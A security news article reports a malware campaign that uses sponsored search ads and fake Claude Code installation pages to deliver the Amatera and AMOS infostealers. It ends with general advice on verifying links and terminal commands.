This fake Claude Code malware could hit anyone who isn’t careful

AI developer tools are gaining popularity fast, which makes them prime targets for hackers. Researchers at Kaspersky discovered a malware campaign disguised as Claude Code installation instructions.

Hackers are using sponsored Google Ads to redirect users to pages that look official. Running the commands from these pages installs malware instead of Claude Code, putting both personal and business data at risk.

Other AI tools are at risk, too

Claude Code is not the only target; OpenClaw and Doubao have also been affected. Attackers are exploiting the rush to try trending AI tools to spread malware efficiently.

These attacks rely on users copying and running installation commands from unverified pages. Anyone who follows a sponsored link or executes commands without checking the domain and instructions can end up installing malware instead of Claude Code.

How the malware works

The malware differs depending on your operating system. Windows users risk installing Amatera, which collects files, browser data, and cryptocurrency wallet information.

Mac users are exposed to AMOS, malware designed to steal information from Apple devices. Both types send stolen data to remote servers, which can include sensitive personal and professional files.

Why sponsored ads are dangerous

Sponsored ads can look legitimate, and attackers sometimes abuse or compromise advertiser accounts to place deceptive download links in search results. In this campaign, the ads led users to pages that mimicked official Claude Code documentation.

Developers searching for Claude Code might click the top ad, thinking it is safe. This often leads to malware installation instead of the intended software.

Little-known fact: Infostealer malware has stolen an estimated 1.8 billion credentials in 2025 alone, driving the majority of automated credential theft and making it one of the fastest-growing threats globally.

Past attacks show a recurring pattern

Kaspersky reported a related AMOS campaign in December 2025 that used paid Google ads and a malicious shared ChatGPT page to trick macOS users into running harmful terminal commands.

The attackers follow a consistent strategy: exploit trust, target high-demand software, and hope users copy commands blindly. The pattern shows that AI developer tools are becoming frequent targets.

The risk to developers is serious

Developers often have access to sensitive files and business projects. Malware infections can compromise intellectual property and internal company data.

Hackers count on this to expand the impact of their attacks beyond personal information. A single infected developer system can put entire networks at risk.

Tips to stay safe online

Always verify links and download software only from official sources. Avoid clicking sponsored ads without checking the URL carefully.

Never blindly copy and paste terminal commands; understand what they do before running them. Using trusted security software can detect threats before damage occurs.

Check commands before running

Even experienced developers can fall for fake instructions if they are not careful. Reviewing commands against official guides is essential to prevent malware installation.

Hackers exploit trust in official-looking pages and the urgency to try trending tools. Taking the extra time to verify commands protects both personal and business information.

Use security solutions proactively

Anti-malware programs, firewalls, and regular updates reduce the risk of infection. Staying proactive with security habits is simpler than dealing with stolen data later.

Developers should combine caution with reliable tools to prevent malware campaigns from succeeding. This approach is the best defense against AI-related malware attacks.

Be cautious with new AI tools

Interest in AI tools is rising, and recent campaigns show attackers are using that popularity as bait. Developers should stay cautious and avoid shortcuts when installing new software.

Sponsored links and fake installation pages have recently been used to spread malware through search results. Staying alert and verifying the domain before clicking can reduce the risk of infection.

Educate teams and colleagues

Sharing knowledge about malware risks can prevent widespread infections in a company. Developers should train peers to verify commands and links before executing them.

A culture of caution strengthens the overall security of a team. Awareness and vigilance are the first lines of defense against disguised malware.

Stay safe while exploring AI

Fake Claude Code malware is a growing threat that can impact anyone who is careless with downloads. Verifying links, reviewing commands, and using security tools are essential steps to stay protected.

Recent campaigns show that attackers are already adapting familiar social-engineering tactics to popular AI products. Developers should stay informed and verify downloads and commands before installing new tools.

Even a single misstep can expose personal information, business data, or intellectual property. Teams and individuals should treat every download and command as potentially risky unless verified.

Sharing knowledge and best practices with colleagues strengthens overall security. Awareness, vigilance, and proactive habits are the most effective defense against disguised malware targeting AI tools.

TL;DR

• Hackers are disguising malware as Claude Code and other AI tools.
• Sponsored Google Ads redirect developers to fake installation pages.
• Windows users risk Amatera; macOS users risk AMOS.
• Verify links, check commands, and use trusted security software to stay safe.
• Awareness and caution prevent personal and business data loss.

This article was made with AI assistance and human editing.

Don’t forget to follow us for more exclusive content on MSN.

If you liked this, you might also like:

• Steam Game Demo Caught Spreading Malware
• TikTok Users Targeted By AI Deepfake Malware Scam
• DNS malware could be the next cyberweapon